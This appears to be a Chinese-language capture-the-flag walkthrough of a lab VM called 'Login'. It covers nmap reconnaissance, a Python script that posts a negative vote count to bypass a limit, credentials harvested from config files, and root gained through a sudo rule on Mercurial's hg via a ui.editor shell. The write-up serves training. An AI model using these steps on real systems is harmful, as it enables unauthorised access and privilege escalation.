信息收集

cmd

1┌──(root㉿kali)-[~]2└─# arp-scan -l | grep PCS3192.168.5.109   08:00:27:ed:16:9a       PCS Systemtechnik GmbH4 5┌──(root㉿kali)-[~]6└─# IP=192.168.5.1097

cmd

1┌──(root㉿kali)-[~]2└─# nmap -sV -sC -A $IP -Pn3Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-12 01:07 EDT4Nmap scan report for Login.lan (192.168.5.109)5Host is up (0.0012s latency).6Not shown: 997 closed tcp ports (reset)7PORT     STATE SERVICE VERSION822/tcp   open  ssh     OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)9| ssh-hostkey: 10|   3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)11|   256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)12|_  256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)1380/tcp   open  http    Apache httpd 2.4.62 ((Debian))14|_http-title: \xE6\x9C\xAA\xE6\x9D\xA5\xE9\xA1\xB9\xE7\x9B\xAE\xE6\x8A\x95\xE7\xA5\xA8\xE7\xB3\xBB\xE7\xBB\x9F15|_http-server-header: Apache/2.4.62 (Debian)169090/tcp open  http    Cockpit web service 221 - 25317| http-title: Loading...18|_Requested resource was https://Login.lan:9090/19MAC Address: 08:00:27:ED:16:9A (PCS Systemtechnik/Oracle VirtualBox virtual NIC)20Device type: general purpose|router21Running: Linux 4.X|5.X, MikroTik RouterOS 7.X22OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.323OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)24Network Distance: 1 hop25Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel26 27TRACEROUTE28HOP RTT     ADDRESS291   1.19 ms Login.lan (192.168.5.109)30 31OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .32Nmap done: 1 IP address (1 host up) scanned in 38.19 seconds

发现了一个投票系统，可以输入数字

由于我没有工具，手搓一个脚本发个包看看

text

1import requests2url = f"http://192.168.5.109/vote/vote.php"3payload = {4    "vote": "1",5    "vote_count": "-10"6}7response = requests.post(url, data=payload, allow_redirects=False)8print(f"[*] Payload: {payload}")9print(f"[*] 状态码: {response.status_code}")

一开始尝试的是 11，发现后端设置了上限，改成 -1 溢出通过了

网页打开刷新得到隐藏信息

text

1pencek:d032fc2b8b

在前面扫描到的 9090 端口用 pencek:d032fc2b8b 登录后台，后台内置的终端读取 flag 即可

cmd

1pencek@Login:~$ cat user.txt2flag{user-d032fc2b8b1213562e5cf594899d1348}

横向移动

尝试 ssh 连接发现失败了

cmd

1pencek@Login:~$ cat /etc/ssh/sshd_config2#       $OpenBSD: sshd_config,v 1.103 2018/04/09 20:41:22 tj Exp $3 4# This is the sshd server system-wide configuration file.  See5# sshd_config(5) for more information.6 7# This sshd was compiled with PATH=/usr/bin:/bin:/usr/sbin:/sbin8 9# The strategy used for options in the default sshd_config shipped with10# OpenSSH is to specify options with their default value where11# possible, but leave them commented.  Uncommented options override the12# default value.13 14Include /etc/ssh/sshd_config.d/*.conf15 16#Port 2217#AddressFamily any18#ListenAddress 0.0.0.019#ListenAddress ::20 21#HostKey /etc/ssh/ssh_host_rsa_key22#HostKey /etc/ssh/ssh_host_ecdsa_key23#HostKey /etc/ssh/ssh_host_ed25519_key24 25# Ciphers and keying26#RekeyLimit default none27 28# Logging29#SyslogFacility AUTH30#LogLevel INFO31 32# Authentication:33 34#LoginGraceTime 2m35PermitRootLogin yes36#StrictModes yes37#MaxAuthTries 638#MaxSessions 1039 40#PubkeyAuthentication yes41 42# Expect .ssh/authorized_keys2 to be disregarded by default in future.43#AuthorizedKeysFile     .ssh/authorized_keys .ssh/authorized_keys244 45#AuthorizedPrincipalsFile none46 47#AuthorizedKeysCommand none48#AuthorizedKeysCommandUser nobody49 50# For this to work you will also need host keys in /etc/ssh/ssh_known_hosts51#HostbasedAuthentication no52# Change to yes if you don't trust ~/.ssh/known_hosts for53# HostbasedAuthentication54#IgnoreUserKnownHosts no55# Don't read the user's ~/.rhosts and ~/.shosts files56#IgnoreRhosts yes57 58# To disable tunneled clear text passwords, change to no here!59#PasswordAuthentication yes60#PermitEmptyPasswords no61 62# Change to yes to enable challenge-response passwords (beware issues with63# some PAM modules and threads)64ChallengeResponseAuthentication no65 66# Kerberos options67#KerberosAuthentication no68#KerberosOrLocalPasswd yes69#KerberosTicketCleanup yes70#KerberosGetAFSToken no71 72# GSSAPI options73#GSSAPIAuthentication no74#GSSAPICleanupCredentials yes75#GSSAPIStrictAcceptorCheck yes76#GSSAPIKeyExchange no77 78# Set this to 'yes' to enable PAM authentication, account processing,79# and session processing. If this is enabled, PAM authentication will80# be allowed through the ChallengeResponseAuthentication and81# PasswordAuthentication.  Depending on your PAM configuration,82# PAM authentication via ChallengeResponseAuthentication may bypass83# the setting of "PermitRootLogin without-password".84# If you just want the PAM account and session checks to run without85# PAM authentication, then enable this but set PasswordAuthentication86# and ChallengeResponseAuthentication to 'no'.87UsePAM yes88 89#AllowAgentForwarding yes90#AllowTcpForwarding yes91#GatewayPorts no92X11Forwarding yes93#X11DisplayOffset 1094#X11UseLocalhost yes95#PermitTTY yes96PrintMotd no97#PrintLastLog yes98#TCPKeepAlive yes99#PermitUserEnvironment no100#Compression delayed101#ClientAliveInterval 0102#ClientAliveCountMax 3103#UseDNS no104#PidFile /var/run/sshd.pid105#MaxStartups 10:30:100106#PermitTunnel no107#ChrootDirectory none108#VersionAddendum none109 110# no default banner path111#Banner none112 113# Allow client to pass locale environment variables114AcceptEnv LANG LC_*115 116# override default of no subsystems117Subsystem       sftp    /usr/lib/openssh/sftp-server118 119# Example of overriding settings on a per-user basis120#Match User anoncvs121#       X11Forwarding no122#       AllowTcpForwarding no123#       PermitTTY no124#       ForceCommand cvs server125DenyUsers pencek126DenyUsers todd

查看 ssh 的配置文件发现 pencek 用户被禁止通过 ssh 登录，遂放弃这一想法

cmd

1pencek@Login:~$ ls /home2pencek  todd

查看 home 目录发现还存在另一个用户 todd，所以考虑横向移动到 todd 之后再找找看有没有可以利用的漏洞

在网站文件中搜索发现了 todd 的痕迹

text

1pencek@Login:~$ grep -ir "todd" /var/www/html 2>/dev/null2/var/www/html/vote/config.php:define('todd','1213562e5cf594899d1348');

成功用 todd:1213562e5cf594899d1348 登录到网站的后台

提权

列出当前用户允许通过 sudo 执行的命令

cmd

1todd@Login:~$ sudo -l2Matching Defaults entries for todd on Login:3    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin4 5User todd may run the following commands on Login:6    (ALL) NOPASSWD: /usr/bin/hg

hg 是 Mercurial 分布式版本控制系统的命令行工具，使用 hg 提权

hg commit 命令必须在一个版本库内执行，并且需要有文件变动才能触发，先创建一个目录并进入，然后初始化一个新的 hg 仓库

cmd

1todd@Login:~$ mkdir pwn2todd@Login:~$ cd pwn3todd@Login:~/pwn$ hg init

创建一个空文件并将这个文件添加到 hg 的追踪列表

cmd

1todd@Login:~/pwn$ touch exp.txt2todd@Login:~/pwn$ hg add exp.txt

执行 commit 命令，同时提供一个用户名并指定编辑器为一个 bash shell

cmd

1todd@Login:~/pwn$ sudo hg commit -u "pwn" --config 'ui.editor=sh -c "/bin/bash"'2root@Login:/home/todd/pwn#

提权成功

cmd

1root@Login:~# cat root.txt2flag{root-e07910a06a086c83ba41827aa00b26ed}